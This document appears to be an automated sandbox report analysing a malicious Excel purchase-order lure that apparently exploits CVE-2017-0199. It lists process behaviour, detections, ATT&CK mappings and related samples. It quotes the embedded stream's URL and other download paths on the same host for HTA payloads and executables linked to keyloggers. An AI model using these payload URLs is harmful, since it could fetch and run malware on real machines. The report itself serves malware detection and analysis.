Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49732 version: TLS 1.2

System Summary

barindex
Source: PO-ARJ-2025-15ACA.xla.xlsxOLE: Microsoft Excel 2007+
Source: PO-ARJ-2025-15ACA.xla.xlsxOLE: Microsoft Excel 2007+
Source: PO-ARJ-2025-15ACA.xla.xlsxOLE indicator, VBA macros: true
Source: PO-ARJ-2025-15ACA.xla.xlsxStream path 'MBD003296A9/\x1Ole' : http://198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta}c2k~;YMP~#:jul8imQHRNLi4k6agtJlqyK7jVsacjoYbopLX46EpMikrPqaGOCPkjhGSlluzrHNA19YzF94SOYQ3dY7G64aAc5cVj5Mq42wOwJg1dZUVXBkJMbxE2CZvqYTLfQiGju8bBNONAaGVKbLATmvFae8iKP5g7HCwh=l t8UOV
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'po-arj-2025-15aca.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal60.winXLSX@4/4@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO-ARJ-2025-15ACA.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{C53B2BF5-626B-47D1-9001-E7DA71CA0BCB} - OProcSessId.datJump to behavior
Source: PO-ARJ-2025-15ACA.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: PO-ARJ-2025-15ACA.xla.xlsxVirustotal: Detection: 43%
Source: PO-ARJ-2025-15ACA.xla.xlsxReversingLabs: Detection: 38%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO-ARJ-2025-15ACA.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: PO-ARJ-2025-15ACA.xla.xlsxStatic file information: File size 1172992 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: PO-ARJ-2025-15ACA.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PO-ARJ-2025-15ACA.xla.xlsxStream path 'MBD003296A8/MBD00320C7F/Package' entropy: 7.98905669124 (max. 8.0)
Source: PO-ARJ-2025-15ACA.xla.xlsxStream path 'Workbook' entropy: 7.99170439258 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 812Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts3
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Extra Window Memory Injection
LSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PO-ARJ-2025-15ACA.xla.xlsx44%VirustotalBrowse
PO-ARJ-2025-15ACA.xla.xlsx39%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
PO-ARJ-2025-15ACA.xla.xlsx100%AviraW97M/AVI.Agent.ziexl
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    s-0005.dual-s-msedge.net
    52.123.128.14
    truefalse
      high
      s-part-0032.t-0009.t-msedge.net
      13.107.246.60
      truefalse
        high
        otelrules.svc.static.microsoft
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
            high
            https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
              high
              http://198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.htafalse
              • Avira URL Cloud: safe
              unknown
              https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                198.12.89.24
                unknownUnited States
                36352AS-COLOCROSSINGUSfalse
                13.107.246.60
                s-part-0032.t-0009.t-msedge.netUnited States
                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1639278
                Start date and time:2025-03-15 09:05:58 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 38s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Run name:Without Instrumentation
                Number of analysed new started processes analysed:19
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:PO-ARJ-2025-15ACA.xla.xlsx
                Detection:MAL
                Classification:mal60.winXLSX@4/4@1/2
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .xlsx
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 52.109.32.97, 23.60.203.209, 52.109.28.47, 199.232.214.172, 13.89.178.27, 23.199.214.10, 52.123.128.14, 40.126.32.68, 172.202.163.200
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, ocsp.digicert.com, login.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedscolprdcus03.centralus.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, uks-azsc-000.roaming.officeapps.live.com, config.officeapps.live.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.ak
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                04:08:18API Interceptor847x Sleep call for process: splwow64.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                198.12.89.24DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                wekissingbestgirleveryseenwithmygirl.htaGet hashmaliciousCobalt Strike, Snake Keylogger, VIP KeyloggerBrowse
                • 198.12.89.24/312/cosse.exe
                signed contract 01.xlsGet hashmaliciousUnknownBrowse
                • 198.12.89.24/xampp/nso/wekissingbestgirleveryseenwithmygirl.hta
                signed contract 01.xlsGet hashmaliciousUnknownBrowse
                • 198.12.89.24/xampp/nso/wekissingbestgirleveryseenwithmygirl.hta
                niceworkingskillwithbestideasevermade.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                • 198.12.89.24/123/casse.exe
                Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                • 198.12.89.24/xampp/ncv/niceworkingskillwithbestideasevermade.hta
                13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
                • www.mimecast.com/Customers/Support/Contact-support/
                http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
                • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                s-part-0032.t-0009.t-msedge.netProof of Payment and Statement.xlsGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                NEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                s-0005.dual-s-msedge.netProof of Payment and Statement.xlsGet hashmaliciousUnknownBrowse
                • 52.123.129.14
                NEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                • 52.123.128.14
                Account statement Payment release.xlsGet hashmaliciousUnknownBrowse
                • 52.123.129.14
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 52.123.128.14
                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                • 52.123.129.14
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 52.123.129.14
                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                • 52.123.128.14
                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                • 52.123.128.14
                bg.microsoft.map.fastly.netNEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                nZsqQiT9Wr.lnkGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                1VjDy92IJ7.exeGet hashmaliciousScreenConnect ToolBrowse
                • 199.232.214.172
                cfooce_wps_yan.exeGet hashmaliciousMicroClipBrowse
                • 199.232.214.172
                Kloptonium-beta.exeGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AS-COLOCROSSINGUSOur Order.xlsGet hashmaliciousUnknownBrowse
                • 198.12.89.24
                Proof of Payment and Statement.xlsGet hashmaliciousUnknownBrowse
                • 192.227.228.22
                APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                • 23.95.235.28
                FORMULARZ ODPRAWY CELNEJ DHL.xlsGet hashmaliciousUnknownBrowse
                • 23.95.235.28
                Account statement Payment release.xlsGet hashmaliciousUnknownBrowse
                • 172.245.123.24
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 198.12.89.24
                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                • 192.3.95.138
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 198.12.89.24
                MICROSOFT-CORP-MSN-AS-BLOCKUSOur Order.xlsGet hashmaliciousUnknownBrowse
                • 20.189.173.10
                APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                • 52.123.128.14
                FORMULARZ ODPRAWY CELNEJ DHL.xlsGet hashmaliciousUnknownBrowse
                • 52.182.143.215
                Account statement Payment release.xlsGet hashmaliciousUnknownBrowse
                • 13.107.253.67
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                a0e9f5d64349fb13191bc781f81f42e1Account statement Payment release.xlsGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                SecuriteInfo.com.Win32.PWSX-gen.3592.16192.exeGet hashmaliciousLummaC StealerBrowse
                • 13.107.246.60
                W1FREE.exeGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                • 13.107.246.60
                No context
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):118
                Entropy (8bit):3.5700810731231707
                Encrypted:false
                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                MD5:573220372DA4ED487441611079B623CD
                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                Malicious:false
                Reputation:high, very likely benign file
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):836
                Entropy (8bit):2.7151910322565733
                Encrypted:false
                SSDEEP:24:J3fIxk+vpKAk6ScvoGA8xpiOnAvJ5yoIHWK:h3+RfkpcvoGAYcvJ5LIHD
                MD5:92A7E6E963E0E668F6585E8694F68380
                SHA1:9CFB8F0EA9A80C54FEBF664E2E8DA3A20C6F5DAE
                SHA-256:F09EE04026948847263A11CC3D3276A676246EF074A985681DBEF03D76801482
                SHA-512:F3E94DC16458B4CE76A18D44360256A233CDF918A34FDB0AB3A85AF5FA3ADEB8B0BBB173CE658D8344939FE77AEB467C04D111A887424A65BA2833897DE3F4E2
                Malicious:false
                Reputation:moderate, very likely benign file
